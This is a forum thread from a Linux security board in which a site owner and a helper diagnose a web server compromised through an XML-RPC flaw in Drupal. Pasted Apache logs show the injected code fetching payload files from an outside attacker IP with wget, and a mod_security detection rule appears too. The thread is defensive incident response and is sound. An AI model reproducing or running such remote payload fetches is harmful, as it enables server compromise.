LinuxQuestions.org
Welcome to the most active Linux Forum on the web.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 12-22-2005, 08:39 AM   #16
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69

Capt_Caveman, yes I'm totally agree with you. In fact I'm concerned..but rebuild the entire system is not an option right now.
Right now I haven't seen anything that says you need to. However if the cracker was able to get root access, then that is the only effective option.

I would like to know how they compromised my /tmp folder too.. but I've limited expertise.
There can several places on many Linux installs that are by default writable to the Apache user, /tmp being one of them. Depending on how your system was configured the server root can be as well. Again though, this is a symptom, files are often placed by crackers in /tmp because it's writeable to the apache user. The real question is how were they able to get access to the apache user and upload files onto the system. Locking down /tmp is a good start in hardening the system, but it doesn't address that issue. Also be carefull on how you go about it, as /tmp needs to be writeable to a wide number of system utils.
 
Old 12-24-2005, 01:52 AM   #17
woranl
Member
 
Registered: Apr 2003
Location: Toronto
Distribution: Fedora Core
Posts: 119

Original Poster
Rep: Reputation: 15
After googling the web. I've found something call modsecurity for apache.. it's a web application firewall..

I installed and configure it.. and it looks like the problem occured because I didn't update my Drupal..

Here is one of the entry in my logfile from modsecurity

Quote:
==09758743==============================
Request: www.mydomain.com ##.##.###.### - - [23/Dec/2005:22:56:56 --0500] "POST /xmlrpc.php HTTP/1.1" 412 323 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1" H@188cCoAGUAAD1eAxsAAAAJ "-"
Handler: php5-script
----------------------------------------
POST /xmlrpc.php HTTP/1.1
Host: ##.##.###.###
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1
Content-Type: text/xml
Content-Length: 269
mod_security-message: Access denied with code 412. Pattern match "<(.|\\n)+>" at POST_PAYLOAD
mod_security-action: 412

269

HTTP/1.1 412 Precondition Failed
Content-Length: 323
Content-Type: text/html; charset=iso-8859-1
--09758743--
Is this HTML/Javascript injection attack? (whatever that is)

Also, after carefully looked at my apache error log, here the part where things went wrong


Quote:
[Tue Dec 20 08:48:43 2005] [error] [client 216.138.244.145] script not found or unable to stat: /var/www/cgi-bin/awstats
[client 216.138.244.145] script '/var/www/html/xmlrpc.php' not found or unable to stat
[client 216.138.244.145] PHP Warning: Unterminated comment starting line 1 in /var/www/html/blog/includes/xmlrpcs.inc(249) : eval()'d code on line 1
--08:48:47-- http://209.136.48.69/mirela
=> `mirela'
Connecting to 209.136.48.69:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 94 [text/plain]

0K 100% 3.90 MB/s

08:48:47 (3.90 MB/s) - `mirela' saved [94/94]

--08:48:47-- http://209.136.48.69/d
=> `d'
Connecting to 209.136.48.69:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 469,240 (458K) [text/plain]

0K ...[Tue Dec 20 08:48:48 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/blog/xmlsrv
....... ...[Tue Dec 20 08:48:49 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/blogs
....... ..[Tue Dec 20 08:48:50 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/drupal
.......[Tue Dec 20 08:48:52 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/phpgroupware
. ......[Tue Dec 20 08:48:53 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/wordpress
..[client 216.138.244.145] script '/var/www/html/xmlrpc.php' not found or unable to stat
.. .......... 10% 6.81 KB/s
50K ...[Tue Dec 20 08:48:55 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/xmlrpc
.......[Tue Dec 20 08:48:56 2005] [error] [client 216.138.244.145] File does not exist: /var/www/html/xmlsrv
.......... .......... .......... .......... 21% 6.95 KB/s
100K .......... .......... .......... .......... .......... 32% 6.94 KB/s
150K .......... .......... .......... .......... .......... 43% 7.11 KB/s
200K .......... .......... .......... .......... .......... 54% 7.17 KB/s
250K .......... .......... .......... .......... .......... 65% 7.60 KB/s
300K .......... .......... .......... .......... .......... 76% 8.67 KB/s
350K .......... .......... .......... .......... .......... 87% 14.05 KB/s
400K .......... .......... .......... .......... .......... 98% 13.90 KB/s
450K ........ 100% 19.13 KB/s

08:49:43 (8.23 KB/s) - `d' saved [469240/469240]

--08:49:43-- http://209.136.48.69/w
=> `w'
Connecting to 209.136.48.69:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34,913 (34K) [text/plain]

0K .......... .......... .......... .... 100% 16.89 KB/s

08:49:45 (16.89 KB/s) - `w' saved [34913/34913]
Now I've modsecurity installed.
Block the attacker ip (although they can always use other IP to attack me again).
hm.. whatelse should I do next?
btw, thanks for all your reply
 
Old 12-26-2005, 05:13 PM   #18
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
Looks like your system is vulnerable to the XML-RPC vulnerability. This is a fairly old bug and Fedora has issued a fix for it. Have you kept your system updated with security fixes/patches? If not, then that is definitely a problem that you need to address immediately.
 
Old 12-26-2005, 05:18 PM   #19
woranl
Member
 
Registered: Apr 2003
Location: Toronto
Distribution: Fedora Core
Posts: 119

Original Poster
Rep: Reputation: 15
when I type yum update in terminal, it said my system is up to date
am I missing something?
 
Old 12-26-2005, 05:31 PM   #20
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
Have you updated since the attack appeared in your logs (Dec 20)?

Also, a little OT, but I would highly recommend running some form of antivirus on the system as well. Cracking binaries are notorious for being infected with linux viruses plus the scan itself resembles that of the lupper/luppi worm and one the the uploaded binaries is approximately the same size (34Mb).
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Help! my new server is SENDING on port 113 ouimet Linux - Security 15 12-15-2004 09:10 AM
Sending mails using port 25 rabeea Linux - Security 10 08-16-2004 11:53 PM
COM Port Stuff gsibble Linux - Software 2 08-11-2004 12:24 AM
Sending email on port 25 and 26 xerophyte Linux - Software 1 01-13-2004 01:58 AM
My box is sending packets on port 513? mac_phil Linux - Networking 2 11-08-2003 01:52 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 05:35 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration